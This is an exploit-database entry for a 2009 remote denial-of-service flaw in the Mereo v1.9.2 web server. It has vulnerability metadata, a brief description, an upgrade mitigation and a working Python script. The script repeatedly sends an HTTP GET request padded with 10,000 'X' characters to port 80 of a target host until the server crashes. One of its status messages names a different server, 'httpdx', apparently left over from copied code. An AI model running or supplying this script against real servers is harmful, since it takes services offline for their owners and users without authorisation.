Mereo v1.9.2 Remote HTTP Server DoS (0day)

vendor:

Mereo

by:

CwG GeNiuS

7,5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Mereo

Affected Version From: 1.9.2

Affected Version To: 1.9.2

Patch Exists: YES

Related CWE: N/A

CPE: mereo

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

Mereo v1.9.2 Remote HTTP Server DoS (0day)

Mereo v1.9.2 is vulnerable to a remote denial of service attack. An attacker can send a specially crafted HTTP request with a large number of 'X' characters to crash the server. This vulnerability affects Mereo v1.9.2 and earlier versions.

Mitigation:

Upgrade to the latest version of Mereo.

Source

Exploit-DB raw data:

#!/usr/bin/python

###########################################################################
#
# Title:    Mereo v1.9.2 Remote HTTP Server DoS (0day)
# By:       CwG GeNiuS
# Email:    cwggenius [at] gmail [dot] com
# Tested:   XPSP3
# Download: http://www.ohloh.net/p/mereo
#
############################################################################


import socket, sys
 
payload ="GET /";
payload+="X" * 10000;
payload+=" HTTP/1.1\r\n\r\n";
count = 1;
 
try:
	while (count < 100):
        	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        	print ("[*] Connecting to httpdx server.");
        	s.connect((sys.argv[1], 80));
        	print ("\n[*] Sending command.\n");
        	s.send(payload);
        	s.close();
 		count = count+1;
		print count;
except:
    print "Successfully Crashed!";